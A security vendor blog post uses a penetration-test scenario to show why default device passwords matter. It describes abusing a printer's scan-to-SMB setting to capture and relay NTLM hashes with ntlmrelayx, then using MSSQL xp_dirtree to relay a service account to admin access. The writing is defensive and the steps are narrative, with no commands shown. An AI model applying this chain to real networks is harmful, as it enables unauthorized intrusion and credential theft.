Trustwave SpiderLabs Uncovers Ov3r_Stealer Malware Spread via Phishing and Facebook Advertising. Learn More

Trustwave SpiderLabs Uncovers Ov3r_Stealer Malware Spread via Phishing and Facebook Advertising. Learn More

Services
Capture
Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

twi-managed-portal-color
Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

twi-briefcase-color-svg
Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

tw-laptop-data
Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

twi-database-color-svg
Database Security

Prevent unauthorized access and exceed compliance requirements.

twi-email-color-svg
Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

tw-officer
Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

tw-network
Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Solutions
BY TOPIC
Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Partners
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

Why It’s Important to Change Default Credentials

Security best practice guidelines always call for changing default passwords as any password left on the factory preset is considered low hanging fruit, essentially just waiting to be abused by attackers to gain unauthorized access.

Frameworks such as Cyber Essentials, PCI DSS, and UK Gov ITHC enforce this practice as one of their test requirements during an audit. The scenario below shows why it is part of a best practice to change default passwords as it could lead to a more severe issue. 53% of data breaches occur due to default or shared credentials, according to the 2022 Verizon Data breach report.

How Default Passwords Can be Abused

Below is a typical login printer page. In most cases, the device ships with a default username and password which is publicly available. Tools such as creds can help identify credentials by simply providing the software or device name.

 

DOC_19909_image002

Figure 1: Default Credentials

 

DOC_19910_image004

Figure 2: Printer Login Page

 

This is an incredibly easy task and one that opens the company or individual up to an immediate attack.

Once authenticated, attackers can access the configuration page as administrator, allowing them to perform malicious tasks. Most current printers come with a feature to allow employees to scan or print to a folder, and to do this a user will need to be setup with permissions to be able to write to a folder on a print server.

Trustwave SpiderLabs has observed that oftentimes the “users” created tend to be part of a domain, sometimes even with higher privileges assigned instead of a restricted account, enabling the account to write to the folder.

In some cases, these credentials on the page itself allows them to be viewed simply by using the “inspect element” option. In other cases, the credentials are stored on the configuration file and will be encrypted. An example of one of these printers is as follows:

 

DOC_19911_image006

Figure 3: SMB Configuration on a Printer/Scanner

 

In this case, the printer does not have any authentication details stored on the page; however, it does have the “Scan destination” option which can be edited. All we need to do is change the “Scan destination” to the IP address of our machine and set up an SMB server with ntlmrelayx.py from Impacket, which will capture the hash and with the “socks” flag in use, it will be possible to use other tools via proxychains. Once the scan destination is set up, there would be an option to “check authentication” or “test connection” on the printer to execute the process to perform the authentication checks.

 

DOC_19912_image008

Figure 4: Hash captured from the Printer.

 

The screenshot above shows that it was possible to relay the captured hash to the print server. In this case, the user did not have administrative privileges on the system, however, with a domain user, it is possible to use it to scan the network to find an accessible file share with potentially sensitive information. The target range would be larger depending on the network and utilizing the “-tf” flag in ntlmrelayx, a target file with SMB signing disabled systems can be provided. During the enumeration phase, a file server was found, and the user was able to access a folder with the “web.config” file readable.

 

DOC_19913_image010

Figure 5: Relaying Hashes with Proxychains

 

Using the information obtained from the “web.config” file, it was then possible to connect to the MSSQL server as the credential and server details were observed. Once connected, issuing the “xp_dirtree” against the rogue SMB server and the target server in ntlmrelayx would be the MSSQL itself, allowing for the hash to be captured and relayed.

 

DOC_19914_image012

Figure 6: Browsing SMB share via MSSQL.

 

Once the command was issued, it was possible to obtain the hashes from the MSSQL server as shown below:

 

DOC_19915_image014

Figure 7: Hashes captured from the MSSQL Server

 

It was observed that the MSSQL server is running as the “SVC_TESTMSSQL” service account. In some cases, SVC accounts will have administrative privileges on a system. As shown above, the AdminStatus is “TRUE” which means we can dump hashes or obtain a shell on the system like the following:

 

DOC_19916_image016

Figure 8: Administrative Access on Server

 

Conclusion

Default passwords on applications/devices can lead to more severe issues when combined with known misconfiguration issues on such as SMB signing disabled. While most modern devices and applications allow for users to set passwords on first installation, it is important that the password policy set out by organizations are adhering to best practices. As for legacy devices and applications, it is best to review the default accounts on these systems and set a complex password as per security best practice guidelines.

Latest SpiderLabs Blogs

Welcome to Adventures in Cybersecurity: The Defender Series

I’m happy to say I’m done chasing Microsoft certifications (AZ104/AZ500/SC100), and as a result, I’ve had the time to put some effort into a blog series that hopefully will entertain and inform you...

Read More

Trustwave SpiderLabs: Insights and Solutions to Defend Educational Institutions Against Cyber Threats

Security teams responsible for defending educational institutions at higher education and primary school levels often find themselves facing harsh lessons from threat actors who exploit the numerous...

Read More

Breakdown of Tycoon Phishing-as-a-Service System

Just weeks after Trustwave SpiderLabs reported on the Greatness phishing-as-a-service (PaaS) framework, SpiderLabs’ Email Security team is tracking another PaaS called Tycoon Group.

Read More